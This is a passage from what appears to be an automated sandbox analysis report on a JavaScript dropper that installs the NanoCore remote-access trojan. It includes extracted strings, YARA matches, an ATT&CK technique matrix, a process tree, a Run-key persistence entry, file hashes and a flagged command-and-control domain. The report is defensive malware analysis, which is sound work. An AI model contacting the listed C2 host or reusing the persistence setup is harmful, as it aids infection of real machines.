EditorBrowsableStateSystem.CodeDom.CompilerGeneratedCodeAttributeSystem.DiagnosticsDebuggerHiddenAttributeMicrosoft.VisualBasic.CompilerServicesStandardModuleAttributeHideModuleNameAttributeSystem.ComponentModel.DesignHelpKeywordAttributeSystem.Runtime.CompilerServicesRuntimeHelpersGetObjectValueRuntimeTypeHandleGetTypeFromHandleActivatorCreateInstanceMyGroupCollectionAttributeget_Valueset_ValueSystem.Runtime.InteropServicesComVisibleAttributeParamArrayAttributeCompilationRelaxationsAttributeRuntimeCompatibilityAttributeSystem.ReflectionAssemblyFileVersionAttributeGuidAttributeAssemblyTrademarkAttributeAssemblyCopyrightAttributeAssemblyProductAttributeAssemblyCompanyAttributeAssemblyDescriptionAttributeAssemblyTitleAttributeClientPluginClientPlugin.dll
        Source: czkdqe.exe, 00000003.00000002.341497445.00000000007E8000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: NanoCore.ClientPluginHost
        Source: czkdqe.exe, 00000003.00000002.342324519.00000000035E1000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: NanoCore.ClientPluginHost
        Source: czkdqe.exe, 00000003.00000002.341910417.00000000023A0000.00000004.08000000.00040000.00000000.sdmpString found in binary or memory: NanoCore.ClientPluginHost
        Source: czkdqe.exe, 00000003.00000002.342556936.0000000004922000.00000040.00001000.00020000.00000000.sdmpString found in binary or memory: NanoCore.ClientPluginHost
        Source: czkdqe.exe, 00000003.00000002.342122347.0000000002630000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: NanoCore.ClientPluginHost
        Source: czkdqe.exe, 00000003.00000002.342122347.0000000002630000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: <Module>mscorlibMicrosoft.VisualBasicMyApplicationNanoCore.MyMyComputerMyProjectMyWebServicesThreadSafeObjectProvider`1IClientNetworkNanoCore.ClientPluginIClientDataIClientAppIClientDataHostNanoCore.ClientPluginHostIClientNetworkHostIClientUIHostIClientLoggingHostIClientAppHostIClientNameObjectCollectionNanoCoreIClientReadOnlyNameObjectCollectionClientInvokeDelegateMicrosoft.VisualBasic.ApplicationServicesApplicationBase.ctorMicrosoft.VisualBasic.DevicesComputerSystemObject.cctorget_Computerm_ComputerObjectProviderget_Applicationm_AppObjectProviderUserget_Userm_UserObjectProviderget_WebServicesm_MyWebServicesObjectProviderApplicationWebServicesEqualsoGetHashCodeTypeGetTypeToStringCreate__Instance__TinstanceDispose__Instance__get_GetInstanceMicrosoft.VisualBasic.MyServices.InternalContextValue`1m_ContextGetInstanceReadPacketpipeNameparamsPipeCreatedPipeClosedConnectionStateChangedconnectedConnectionFailedhostportBuildingHostCacheVariableChangednameClientSettingChangedPluginUninstallingClientUninstallingget_Variablesget_ClientSettingsget_BuilderSettingsVariablesClientSettingsBuilderSettingsget_ConnectedClosePipePipeExistsRebuildHostCacheAddHostEntryDisconnectSendToServercompressConnectedInvokemethodstateLogClientMessagemessageExceptionLogClientExceptionexsiteRestartShutdownDisableProtectionRestoreProtectionUninstallEntryExistsSystem.Collections.GenericKeyValuePair`2GetEntriesGetValuedefaultValueSetValuevalueRemoveValueMulticastDelegateTargetObjectTargetMethodIAsyncResultAsyncCallbackBeginInvokeDelegateCallbackDelegateAsyncStateEndInvokeDelegateAsyncResultSystem.ComponentModelEditorBrowsableAttributeEditorBrowsableStateSystem.CodeDom.CompilerGeneratedCodeAttributeSystem.DiagnosticsDebuggerHiddenAttributeMicrosoft.VisualBasic.CompilerServicesStandardModuleAttributeHideModuleNameAttributeSystem.ComponentModel.DesignHelpKeywordAttributeSystem.Runtime.CompilerServicesRuntimeHelpersGetObjectValueRuntimeTypeHandleGetTypeFromHandleActivatorCreateInstanceMyGroupCollectionAttributeget_Valueset_ValueSystem.Runtime.InteropServicesComVisibleAttributeParamArrayAttributeCompilationRelaxationsAttributeRuntimeCompatibilityAttributeSystem.ReflectionAssemblyFileVersionAttributeGuidAttributeAssemblyTrademarkAttributeAssemblyCopyrightAttributeAssemblyProductAttributeAssemblyCompanyAttributeAssemblyDescriptionAttributeAssemblyTitleAttributeClientPluginClientPlugin.dll
        Source: Yara matchFile source: 3.2.czkdqe.exe.36631e4.8.unpack, type: UNPACKEDPE
        Source: Yara matchFile source: 3.2.czkdqe.exe.23a0000.3.raw.unpack, type: UNPACKEDPE
        Source: Yara matchFile source: 3.2.czkdqe.exe.23a0000.3.unpack, type: UNPACKEDPE
        Source: Yara matchFile source: 3.2.czkdqe.exe.400000.0.unpack, type: UNPACKEDPE
        Source: Yara matchFile source: 3.2.czkdqe.exe.366780d.7.raw.unpack, type: UNPACKEDPE
        Source: Yara matchFile source: 3.2.czkdqe.exe.35e5530.5.unpack, type: UNPACKEDPE
        Source: Yara matchFile source: 3.2.czkdqe.exe.36631e4.8.raw.unpack, type: UNPACKEDPE
        Source: Yara matchFile source: 3.2.czkdqe.exe.804368.2.raw.unpack, type: UNPACKEDPE
        Source: Yara matchFile source: 3.2.czkdqe.exe.417058.1.unpack, type: UNPACKEDPE
        Source: Yara matchFile source: 3.2.czkdqe.exe.4920000.9.unpack, type: UNPACKEDPE
        Source: Yara matchFile source: 3.2.czkdqe.exe.365e3ae.6.raw.unpack, type: UNPACKEDPE
        Source: Yara matchFile source: 3.2.czkdqe.exe.804368.2.unpack, type: UNPACKEDPE
        Source: Yara matchFile source: 3.2.czkdqe.exe.35e5530.5.raw.unpack, type: UNPACKEDPE
        Source: Yara matchFile source: 3.2.czkdqe.exe.417058.1.raw.unpack, type: UNPACKEDPE
        Source: Yara matchFile source: 00000003.00000002.342324519.000000000361C000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
        Source: Yara matchFile source: 00000003.00000002.342324519.00000000035E1000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
        Source: Yara matchFile source: 00000003.00000002.341180010.0000000000415000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
        Source: Yara matchFile source: 00000003.00000002.341497445.00000000007E8000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
        Source: Yara matchFile source: 00000003.00000002.342556936.0000000004922000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY
        Source: Yara matchFile source: 00000003.00000002.341910417.00000000023A0000.00000004.08000000.00040000.00000000.sdmp, type: MEMORY
        Source: Yara matchFile source: Process Memory Space: czkdqe.exe PID: 2264, type: MEMORYSTR
        Initial AccessExecutionPersistencePrivilege EscalationDefense EvasionCredential AccessDiscoveryLateral MovementCollectionExfiltrationCommand and ControlNetwork EffectsRemote Service EffectsImpact
        Valid Accounts13
        Scripting
        1
        Registry Run Keys / Startup Folder
        1
        Access Token Manipulation
        1
        Disable or Modify Tools
        11
        Input Capture
        1
        System Time Discovery
        Remote Services11
        Archive Collected Data
        Exfiltration Over Other Network Medium1
        Encrypted Channel
        Eavesdrop on Insecure Network CommunicationRemotely Track Device Without Authorization1
        System Shutdown/Reboot
        Default Accounts12
        Native API
        Boot or Logon Initialization Scripts111
        Process Injection
        11
        Deobfuscate/Decode Files or Information
        LSASS Memory2
        File and Directory Discovery
        Remote Desktop Protocol11
        Input Capture
        Exfiltration Over Bluetooth1
        Data Encoding
        Exploit SS7 to Redirect Phone Calls/SMSRemotely Wipe Data Without AuthorizationDevice Lockout
        Domain Accounts1
        Exploitation for Client Execution
        Logon Script (Windows)1
        Registry Run Keys / Startup Folder
        13
        Scripting
        Security Account Manager26
        System Information Discovery
        SMB/Windows Admin Shares1
        Clipboard Data
        Automated Exfiltration1
        Remote Access Software
        Exploit SS7 to Track Device LocationObtain Device Cloud BackupsDelete Device Data
        Local Accounts2
        Command and Scripting Interpreter
        Logon Script (Mac)Logon Script (Mac)3
        Obfuscated Files or Information
        NTDS41
        Security Software Discovery
        Distributed Component Object ModelInput CaptureScheduled Transfer1
        Application Layer Protocol
        SIM Card SwapCarrier Billing Fraud
        Cloud AccountsCronNetwork Logon ScriptNetwork Logon Script21
        Software Packing
        LSA Secrets31
        Virtualization/Sandbox Evasion
        SSHKeyloggingData Transfer Size LimitsFallback ChannelsManipulate Device CommunicationManipulate App Store Rankings or Ratings
        Replication Through Removable MediaLaunchdRc.commonRc.common1
        Masquerading
        Cached Domain Credentials1
        Remote System Discovery
        VNCGUI Input CaptureExfiltration Over C2 ChannelMultiband CommunicationJamming or Denial of ServiceAbuse Accessibility Features
        External Remote ServicesScheduled TaskStartup ItemsStartup Items31
        Virtualization/Sandbox Evasion
        DCSyncNetwork SniffingWindows Remote ManagementWeb Portal CaptureExfiltration Over Alternative ProtocolCommonly Used PortRogue Wi-Fi Access PointsData Encrypted for Impact
        Drive-by CompromiseCommand and Scripting InterpreterScheduled Task/JobScheduled Task/Job1
        Access Token Manipulation
        Proc FilesystemNetwork Service ScanningShared WebrootCredential API HookingExfiltration Over Symmetric Encrypted Non-C2 ProtocolApplication Layer ProtocolDowngrade to Insecure ProtocolsGenerate Fraudulent Advertising Revenue
        Exploit Public-Facing ApplicationPowerShellAt (Linux)At (Linux)111
        Process Injection
        /etc/passwd and /etc/shadowSystem Network Connections DiscoverySoftware Deployment ToolsData StagedExfiltration Over Asymmetric Encrypted Non-C2 ProtocolWeb ProtocolsRogue Cellular Base StationData Destruction
        Supply Chain CompromiseAppleScriptAt (Windows)At (Windows)1
        Hidden Files and Directories
        Network SniffingProcess DiscoveryTaint Shared ContentLocal Data StagingExfiltration Over Unencrypted/Obfuscated Non-C2 ProtocolFile Transfer ProtocolsData Encrypted for Impact
        Hide Legend

        Legend:

        • Process
        • Signature
        • Created File
        • DNS/IP Info
        • Is Dropped
        • Is Windows Process
        • Number of created Registry Values
        • Number of created Files
        • Visual Basic
        • Delphi
        • Java
        • .Net C# or VB.NET
        • C, C++ or other language
        • Is malicious
        • Internet
        behaviorgraph top1 signatures2 2 Behavior Graph ID: 796104 Sample: SCAN COPY CV 310123.js Startdate: 01/02/2023 Architecture: WINDOWS Score: 100 51 Malicious sample detected (through community Yara rule) 2->51 53 Antivirus detection for URL or domain 2->53 55 Antivirus / Scanner detection for submitted sample 2->55 57 6 other signatures 2->57 10 wscript.exe 2 2->10         started        14 vktp.exe 2->14         started        16 vktp.exe 2->16         started        process3 file4 43 C:\Users\user\AppData\Roaming\vtvt.exe, PE32 10->43 dropped 61 Benign windows process drops PE files 10->61 63 JScript performs obfuscated calls to suspicious functions 10->63 18 vtvt.exe 19 10->18         started        22 WerFault.exe 10 14->22         started        24 WerFault.exe 10 16->24         started        signatures5 process6 file7 39 C:\Users\user\AppData\Local\Temp\czkdqe.exe, PE32 18->39 dropped 59 Machine Learning detection for dropped file 18->59 26 czkdqe.exe 1 2 18->26         started        signatures8 process9 file10 45 C:\Users\user\AppData\Roaming\...\vktp.exe, PE32 26->45 dropped 65 Detected unpacking (creates a PE file in dynamic memory) 26->65 67 Found evasive API chain (may stop execution after reading information in the PEB, e.g. number of processors) 26->67 69 Maps a DLL or memory area into another process 26->69 30 czkdqe.exe 6 26->30         started        signatures11 process12 file13 47 C:\Users\user\AppData\Roaming\...\run.dat, data 30->47 dropped 49 C:\Users\user\AppData\...\czkdqe.exe.log, ASCII 30->49 dropped 71 Hides that the sample has been downloaded from the Internet (zone.identifier) 30->71 34 czkdqe.exe 30->34         started        signatures14 process15 process16 36 WerFault.exe 24 9 34->36         started        file17 41 C:\ProgramData\Microsoft\...\Report.wer, Unicode 36->41 dropped

        This section contains all screenshots as thumbnails, including those not shown in the slideshow.


        windows-stand
        SourceDetectionScannerLabelLink
        SCAN COPY CV 310123.js46%ReversingLabsScript-JS.Downloader.Nemucod
        SCAN COPY CV 310123.js100%AviraJS/Dropper.G1
        SourceDetectionScannerLabelLink
        C:\Users\user\AppData\Roaming\vtvt.exe100%Joe Sandbox ML
        SourceDetectionScannerLabelLinkDownload
        3.2.czkdqe.exe.4920000.9.unpack100%AviraTR/Dropper.MSIL.Gen7Download File
        2.2.czkdqe.exe.21d0000.1.unpack100%AviraHEUR/AGEN.1230506Download File
        3.2.czkdqe.exe.400000.0.unpack100%AviraTR/Dropper.MSIL.Gen7Download File
        0.2.wscript.exe.1dd81520090.0.unpack100%AviraTR/Patched.Ren.GenDownload File
        1.2.vtvt.exe.28c9516.1.unpack100%AviraHEUR/AGEN.1230498Download File
        No Antivirus matches
        SourceDetectionScannerLabelLink
        bition.duckdns.org100%Avira URL Cloudmalware
        No contacted domains info
        NameMaliciousAntivirus DetectionReputation
        bition.duckdns.orgtrue
        • Avira URL Cloud: malware
        unknown
        NameSourceMaliciousAntivirus DetectionReputation
        http://upx.sf.netAmcache.hve.12.drfalse
          high
          http://nsis.sf.net/NSIS_ErrorErrorwscript.exe, 00000000.00000003.320076363.000001DDFE405000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000002.325020918.000001DD81520000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.317670547.000001DD806AF000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.319848933.000001DD80650000.00000004.00000020.00020000.00000000.sdmp, vtvt.exe, 00000001.00000002.337439008.000000000040A000.00000004.00000001.01000000.00000006.sdmp, vtvt.exe, 00000001.00000000.319796185.000000000040A000.00000008.00000001.01000000.00000006.sdmp, vtvt.exe.0.drfalse
            high
            http://schemas.xmlsoap.org/ws/2005/05/identity/claims/nameczkdqe.exe, 00000003.00000002.342122347.0000000002630000.00000004.00000800.00020000.00000000.sdmpfalse
              high
              No contacted IP infos
              Joe Sandbox Version:36.0.0 Rainbow Opal
              Analysis ID:796104
              Start date and time:2023-02-01 16:38:30 +01:00
              Joe Sandbox Product:CloudBasic
              Overall analysis duration:0h 11m 29s
              Hypervisor based Inspection enabled:false
              Report type:full
              Cookbook file name:default.jbs
              Analysis system description:Windows 10 64 bit v1803 with Office Professional Plus 2016, Chrome 104, IE 11, Adobe Reader DC 19, Java 8 Update 211
              Number of analysed new started processes analysed:40
              Number of new started drivers analysed:0
              Number of existing processes analysed:0
              Number of existing drivers analysed:0
              Number of injected processes analysed:1
              Technologies:
              • HCA enabled
              • EGA enabled
              • HDC enabled
              • GSI enabled (Javascript)
              • AMSI enabled
              Analysis Mode:default
              Analysis stop reason:Timeout
              Sample file name:SCAN COPY CV 310123.js
              Detection:MAL
              Classification:mal100.troj.evad.winJS@13/22@0/0
              EGA Information:
              • Successful, ratio: 100%
              HDC Information:
              • Successful, ratio: 93.8% (good quality ratio 89.6%)
              • Quality average: 84.9%
              • Quality standard deviation: 25.6%
              HCA Information:
              • Successful, ratio: 100%
              • Number of executed functions: 78
              • Number of non-executed functions: 69
              Cookbook Comments:
              • Found application associated with file extension: .js
              • Override analysis time to 240s for JS/VBS files not yet terminated
              • Exclude process from analysis (whitelisted): MpCmdRun.exe, dllhost.exe, audiodg.exe, consent.exe, BackgroundTransferHost.exe, WerFault.exe, RuntimeBroker.exe, WMIADAP.exe, backgroundTaskHost.exe, conhost.exe, svchost.exe
              • Excluded IPs from analysis (whitelisted): 20.189.173.20, 20.189.173.21, 20.189.173.22
              • Excluded domains from analysis (whitelisted): login.live.com, store-images.s-microsoft.com, blobcollector.events.data.trafficmanager.net, onedsblobprdwus15.westus.cloudapp.azure.com, onedsblobprdwus16.westus.cloudapp.azure.com, onedsblobprdwus17.westus.cloudapp.azure.com, displaycatalog.mp.microsoft.com, img-prod-cms-rt-microsoft-com.akamaized.net, watson.telemetry.microsoft.com, arc.msn.com
              • Not all processes where analyzed, report is missing behavior information
              • Report creation exceeded maximum time and may have missing disassembly code information.
              • Report size exceeded maximum capacity and may have missing behavior information.
              • Report size getting too big, too many NtOpenKeyEx calls found.
              • Report size getting too big, too many NtProtectVirtualMemory calls found.
              • Report size getting too big, too many NtQueryValueKey calls found.
              • VT rate limit hit for: SCAN COPY CV 310123.js
              TimeTypeDescription
              16:39:33AutostartRun: HKCU\Software\Microsoft\Windows\CurrentVersion\Run wyhcmkdbbhw C:\Users\user\AppData\Roaming\jrwodjjaoqgx\vktp.exe "C:\Users\user\AppData\Local\Temp\czkdqe.exe" C:\Users\user\AppData\Local\
              16:39:42AutostartRun: HKCU64\Software\Microsoft\Windows\CurrentVersion\Run wyhcmkdbbhw C:\Users\user\AppData\Roaming\jrwodjjaoqgx\vktp.exe "C:\Users\user\AppData\Local\Temp\czkdqe.exe" C:\Users\user\AppData\Local\
              16:39:48API Interceptor3x Sleep call for process: WerFault.exe modified
              No context
              No context
              No context
              No context
              No context
              Process:C:\Windows\SysWOW64\WerFault.exe
              File Type:Unicode text, UTF-16, little-endian text, with CRLF line terminators
              Category:dropped
              Size (bytes):65536
              Entropy (8bit):0.9125227039719778
              Encrypted:false
              SSDEEP:96:WyFxMIh9/htN74TNFpXIQcQ1c6ZcEucw3sZ+HbHgA5JHQ0DFF/+xnj+EBmBim2nt:d7MkSH7d0YOjkBy8/u7sxS274It7
              MD5:3210013EC3B647C6A8F934BE0CF1BF01
              SHA1:DCDB0CEAA08A73FC6E7AAE7FE6CB7BD55C89EEB0
              SHA-256:FD899DDEB318C67C6830B7BCD9A3978E25B8F69E58BA49D56086DD5FEA6D8DDC
              SHA-512:566DF17F64D2D95C50E003FDF2546BE2735DBC931CC467EBC89AF8764CAB8556C54590580AD844D144ECDCC22A06BA5091F47A439631FBA6941691526863790C
              Malicious:true
              Reputation:low
              Preview:..V.e.r.s.i.o.n.=.1.....E.v.e.n.t.T.y.p.e.=.B.E.X.....E.v.e.n.t.T.i.m.e.=.1.3.3.1.9.7.3.9.5.8.4.7.1.3.9.2.2.1.....R.e.p.o.r.t.T.y.p.e.=.2.....C.o.n.s.e.n.t.=.1.....U.p.l.o.a.d.T.i.m.e.=.1.3.3.1.9.7.3.9.5.8.7.6.2.0.1.5.8.8.....R.e.p.o.r.t.S.t.a.t.u.s.=.5.2.4.3.8.4.....R.e.p.o.r.t.I.d.e.n.t.i.f.i.e.r.=.6.9.7.a.5.1.f.a.-.4.8.e.2.-.4.e.6.c.-.a.4.b.b.-.2.a.6.1.6.3.0.2.a.1.e.0.....I.n.t.e.g.r.a.t.o.r.R.e.p.o.r.t.I.d.e.n.t.i.f.i.e.r.=.a.c.2.a.4.8.5.3.-.c.5.2.2.-.4.b.f.a.-.9.d.3.2.-.d.a.8.d.c.7.f.6.d.c.d.d.....W.o.w.6.4.H.o.s.t.=.3.4.4.0.4.....W.o.w.6.4.G.u.e.s.t.=.3.3.2.....N.s.A.p.p.N.a.m.e.=.c.z.k.d.q.e...e.x.e.....A.p.p.S.e.s.s.i.o.n.G.u.i.d.=.0.0.0.0.0.5.5.c.-.0.0.0.1.-.0.0.1.f.-.7.b.3.9.-.2.7.6.6.5.3.3.6.d.9.0.1.....T.a.r.g.e.t.A.p.p.I.d.=.W.:.0.0.0.6.c.6.4.2.0.a.8.2.f.6.b.c.0.b.9.9.1.0.7.f.a.2.9.f.6.6.c.8.4.c.1.e.0.0.0.0.f.f.f.f.!.0.0.0.0.6.4.d.0.b.8.d.5.8.8.0.2.8.5.5.e.d.b.2.0.2.f.3.f.0.2.0.b.3.f.8.c.c.3.8.e.2.d.e.c.!.c.z.k.d.q.e...e.x.e.....T.a.r.g.e.t.A.p.p.V.e.r.=.2.0.2.3././.0.1./.
              Process:C:\Windows\SysWOW64\WerFault.exe
              File Type:Unicode text, UTF-16, little-endian text, with CRLF line terminators
              Category:dropped
              Size (bytes):65536
              Entropy (8bit):0.913981355627896
              Encrypted:false
              SSDEEP:96:rAqFqVvPmCuI5oshtm74TNFpXIQcQrc6vqbcErcw32+HbHgA5JHQ0DFF/+xnj+Hc:rzQVvIcXHFLmxrjk5y8/u7sxS274ItP
              MD5:24BBD8A0D24CCCC05C79F7F70DA51733
              SHA1:E927C14DBBA51C5E34A999053B1760989BD9BDF8
              SHA-256:B2A37940ED32D336515BADB534704187B69B7F1D84102B66FAA87810AC192816
              SHA-512:3EED8BFE6121C844418758E6AEE5C10BF749F424803F5DFFF40A30F2BC24C4C1649628F629B6FBF2ACA7EFC907FF8F91FE7E5FB0760E5ADD81CE83D6D77C54B8
              Malicious:false
              Reputation:low
              Preview:..V.e.r.s.i.o.n.=.1.....E.v.e.n.t.T.y.p.e.=.B.E.X.....E.v.e.n.t.T.i.m.e.=.1.3.3.1.9.7.3.9.5.9.1.6.2.9.0.5.8.3.....R.e.p.o.r.t.T.y.p.e.=.2.....C.o.n.s.e.n.t.=.1.....U.p.l.o.a.d.T.i.m.e.=.1.3.3.1.9.7.3.9.5.9.2.3.7.9.0.5.5.1.....R.e.p.o.r.t.S.t.a.t.u.s.=.5.2.4.3.8.4.....R.e.p.o.r.t.I.d.e.n.t.i.f.i.e.r.=.8.5.7.6.5.a.4.2.-.1.c.2.9.-.4.c.a.0.-.8.4.a.9.-.f.5.e.f.6.3.1.b.3.f.8.e.....I.n.t.e.g.r.a.t.o.r.R.e.p.o.r.t.I.d.e.n.t.i.f.i.e.r.=.3.8.1.0.b.3.5.d.-.1.9.e.2.-.4.5.0.d.-.a.2.b.7.-.b.6.a.6.0.1.d.a.6.1.5.4.....W.o.w.6.4.H.o.s.t.=.3.4.4.0.4.....W.o.w.6.4.G.u.e.s.t.=.3.3.2.....N.s.A.p.p.N.a.m.e.=.v.k.t.p...e.x.e.....A.p.p.S.e.s.s.i.o.n.G.u.i.d.=.0.0.0.0.0.8.7.0.-.0.0.0.1.-.0.0.1.f.-.1.3.5.e.-.d.d.6.b.5.3.3.6.d.9.0.1.....T.a.r.g.e.t.A.p.p.I.d.=.W.:.0.0.0.6.5.e.9.b.e.6.4.e.6.d.8.0.8.d.f.f.8.0.c.c.f.1.0.6.0.0.c.4.7.7.a.1.0.0.0.0.f.f.f.f.!.0.0.0.0.6.4.d.0.b.8.d.5.8.8.0.2.8.5.5.e.d.b.2.0.2.f.3.f.0.2.0.b.3.f.8.c.c.3.8.e.2.d.e.c.!.v.k.t.p...e.x.e.....T.a.r.g.e.t.A.p.p.V.e.r.=.2.0.2.3././.0.1././.3.1.:.
              Process:C:\Windows\SysWOW64\WerFault.exe
              File Type:Unicode text, UTF-16, little-endian text, with CRLF line terminators
              Category:dropped
              Size (bytes):65536
              Entropy (8bit):0.9211892444055715
              Encrypted:false
              SSDEEP:96:YwFzuI5Eshtm74TNFpXIQcQrc6vqbcErcw32+HbHg/LAeugtYsaGFYAKcEoNoipZ:1ccbHFLmxrj1pIt/u7sxS274ItP
              MD5:F8ADBC886586CAB3EEAFCF4CC14DEB37
              SHA1:6D479EC4319BAA4D2291E3CF0274BAAF67E840B8
              SHA-256:259363B629B5DDA25C1E6FCADE2428631FA23B9B3E16A8E8CF51504EF6B2348C
              SHA-512:2B926B9200E0D8FCC7E892B3055D20E401B158847D09E4BA23AABBED892B9A04A71954A0C0A2B9844854E7D0B725D0457B959A9D6A85389006F5F02E7AE289CB
              Malicious:false
              Preview:..V.e.r.s.i.o.n.=.1.....E.v.e.n.t.T.y.p.e.=.B.E.X.....E.v.e.n.t.T.i.m.e.=.1.3.3.1.9.7.3.9.5.8.6.8.4.9.6.2.4.4.....R.e.p.o.r.t.T.y.p.e.=.2.....C.o.n.s.e.n.t.=.1.....U.p.l.o.a.d.T.i.m.e.=.1.3.3.1.9.7.3.9.5.8.7.8.0.2.7.3.7.7.....R.e.p.o.r.t.S.t.a.t.u.s.=.5.2.4.3.8.4.....R.e.p.o.r.t.I.d.e.n.t.i.f.i.e.r.=.a.f.9.5.2.5.8.1.-.9.f.f.c.-.4.1.2.f.-.a.9.2.1.-.2.c.1.2.e.7.1.d.4.c.8.3.....I.n.t.e.g.r.a.t.o.r.R.e.p.o.r.t.I.d.e.n.t.i.f.i.e.r.=.5.9.e.5.9.d.8.3.-.9.e.8.8.-.4.2.f.f.-.8.d.f.1.-.5.c.b.8.b.f.7.5.0.5.c.2.....W.o.w.6.4.H.o.s.t.=.3.4.4.0.4.....W.o.w.6.4.G.u.e.s.t.=.3.3.2.....N.s.A.p.p.N.a.m.e.=.v.k.t.p...e.x.e.....A.p.p.S.e.s.s.i.o.n.G.u.i.d.=.0.0.0.0.1.3.4.8.-.0.0.0.1.-.0.0.1.f.-.4.e.c.6.-.d.c.6.6.5.3.3.6.d.9.0.1.....T.a.r.g.e.t.A.p.p.I.d.=.W.:.0.0.0.6.5.e.9.b.e.6.4.e.6.d.8.0.8.d.f.f.8.0.c.c.f.1.0.6.0.0.c.4.7.7.a.1.0.0.0.0.f.f.f.f.!.0.0.0.0.6.4.d.0.b.8.d.5.8.8.0.2.8.5.5.e.d.b.2.0.2.f.3.f.0.2.0.b.3.f.8.c.c.3.8.e.2.d.e.c.!.v.k.t.p...e.x.e.....T.a.r.g.e.t.A.p.p.V.e.r.=.2.0.2.3././.0.1././.3.1.:.
              Process:C:\Windows\SysWOW64\WerFault.exe
              File Type:Mini DuMP crash report, 14 streams, Wed Feb 1 15:39:46 2023, 0x1205a4 type
              Category:dropped
              Size (bytes):38046
              Entropy (8bit):2.166359718723152
              Encrypted:false
              SSDEEP:192:J6Vuyy2+znZtAnmOz4kxgK5O0yaK7DRc77+l0T7W:Vt0xz5x5ybO77z
              MD5:FFB0205BE7091589810279FF00EC32C8
              SHA1:B8511C570B647F1ED75DF4FC5FBAD1183569A943
              SHA-256:D410FA3A2FA7A63811E0AE55572A3AF74F7D7EF34C765ECE6DBC45DA201F13DE
              SHA-512:CDE382C71053419F53F85BBFB63CFDCCDC6851AF4EF36D10EADE77ABEC67F0F1D8D2B567408FE02FE6C44C18C564CEB558386E5D1DE7B69F8E3EAE6C4535D4E2
              Malicious:false
              Preview:MDMP....... .........c........................(...............V,..........T.......8...........T................|...........................................................................................U...........B......H.......GenuineIntelW...........T.......\......c.............................0..................W... .E.u.r.o.p.e. .S.t.a.n.d.a.r.d. .T.i.m.e.......................................W... .E.u.r.o.p.e. .D.a.y.l.i.g.h.t. .T.i.m.e.......................................1.7.1.3.4...1...x.8.6.f.r.e...r.s.4._.r.e.l.e.a.s.e...1.8.0.4.1.0.-.1.8.0.4.....................................................................................................................................................................................................................................................................................................................................................................................................................................................
              Process:C:\Windows\SysWOW64\WerFault.exe
              File Type:Mini DuMP crash report, 14 streams, Wed Feb 1 15:39:47 2023, 0x1205a4 type
              Category:dropped
              Size (bytes):44102
              Entropy (8bit):2.0471420294279095
              Encrypted:false
              SSDEEP:192:8eOT2f8CMCiCOX4g1LmcaxBdNiBRAosBDXM9nwv9Y7M:iC+X11OiBmX69nw5
              MD5:F442F4C7634651C16E307B4D20FBA1AC
              SHA1:7E9846E9F90A29B8DDAC6812279320F6239EF448
              SHA-256:A2CAA6E05B33BC87E061F489C99CC353D5DF0729B3D6F637BCAA0FA5B357DE73
              SHA-512:91650A624EEBF34C7BFD1925E3EF6D307B3C7629133EBE2B8E41329361866491ACFCF30C9D943F9B2122F06776888866925A7C922209F6A1A2FCC72F8917C981
              Malicious:false
              Preview:MDMP....... .........c........................................./..........T.......8...........T...........(...............`...........L....................................................................U...........B..............GenuineIntelW...........T.......H......c............................. ..................W... .E.u.r.o.p.e. .S.t.a.n.d.a.r.d. .T.i.m.e.......................................W... .E.u.r.o.p.e. .D.a.y.l.i.g.h.t. .T.i.m.e.......................................1.7.1.3.4...1...x.8.6.f.r.e...r.s.4._.r.e.l.e.a.s.e...1.8.0.4.1.0.-.1.8.0.4.....................................................................................................................................................................................................................................................................................................................................................................................................................................................
              Process:C:\Windows\SysWOW64\WerFault.exe
              File Type:XML 1.0 document, Unicode text, UTF-16, little-endian text, with CRLF line terminators
              Category:dropped
              Size (bytes):6312
              Entropy (8bit):3.717177471176192
              Encrypted:false
              SSDEEP:192:Rrl7r3GLNisb6JYUS57++prb89bnBsfFtm:RrlsNiw6JYUS0n6fu
              MD5:72C44BD79F582591E86D868E966A7F2F
              SHA1:915B531561083FAF72546E3CE1F94082BA1B7A15
              SHA-256:FA257CDE562CED748D63A4FB7B6A6AF77F5295CCF1A674AA87D093952FC749DA
              SHA-512:B424E03C1BDA983BC465C65393D0EB12A763818BA807361728EDF4A653AF2EB0B7253BBA0B9ADF31D6478C9E09A98A7E0E9A646EBF03B4B5EBB1C038A73B4A83
              Malicious:false
              Preview:..<.?.x.m.l. .v.e.r.s.i.o.n.=.".1...0.". .e.n.c.o.d.i.n.g.=.".U.T.F.-.1.6.".?.>.....<.W.E.R.R.e.p.o.r.t.M.e.t.a.d.a.t.a.>.......<.O.S.V.e.r.s.i.o.n.I.n.f.o.r.m.a.t.i.o.n.>.........<.W.i.n.d.o.w.s.N.T.V.e.r.s.i.o.n.>.1.0...0.<./.W.i.n.d.o.w.s.N.T.V.e.r.s.i.o.n.>.........<.B.u.i.l.d.>.1.7.1.3.4.<./.B.u.i.l.d.>.........<.P.r.o.d.u.c.t.>.(.0.x.3.0.).:. .W.i.n.d.o.w.s. .1.0. .P.r.o.<./.P.r.o.d.u.c.t.>.........<.E.d.i.t.i.o.n.>.P.r.o.f.e.s.s.i.o.n.a.l.<./.E.d.i.t.i.o.n.>.........<.B.u.i.l.d.S.t.r.i.n.g.>.1.7.1.3.4...1...a.m.d.6.4.f.r.e...r.s.4._.r.e.l.e.a.s.e...1.8.0.4.1.0.-.1.8.0.4.<./.B.u.i.l.d.S.t.r.i.n.g.>.........<.R.e.v.i.s.i.o.n.>.1.<./.R.e.v.i.s.i.o.n.>.........<.F.l.a.v.o.r.>.M.u.l.t.i.p.r.o.c.e.s.s.o.r. 